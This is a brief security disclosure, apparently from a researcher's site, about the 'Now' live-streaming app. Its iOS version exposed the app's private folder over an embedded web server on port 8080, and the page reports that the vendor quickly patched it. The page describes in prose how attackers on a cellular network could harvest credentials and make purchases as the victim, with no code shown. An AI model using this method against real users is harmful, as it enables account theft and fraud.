Embedded Files
Now is a live broadcast app, which ranks top 10 of social networking category in China. When the app lunched, the app use third-party library MongooseDaemon to provide network service on port 8080. By using this service, the app expose private folder of this app for any unauthorized access. Data exposed by the app is depicted as below. By downloading data in the private folder, an attacker can obtain credential of the victim. With the credential, the attacker can sign in the app in other user’s identity to perform In-App Purchases with the pre-deposit money. This service works in cellular network, and attacker can scan in the cellular network to find victims. Vendor of this app, “Tencent Technology(Shenzhen)Company Limited”, ranks this security issue as high, and perform a quick response to this issue, this problem is fixed via hot patch in the same day as they received the notification. By auditing the Android counterpart, we find this issue does not exist in Android app.
Demo:
Demo:
Attack demo for Now app
Data exposed by Now
Vendor Response:
Vendor Response:
Official response from vendor's security response center (translated by google translate)
Official response from vendor's security response center
Google Sites
Report abuse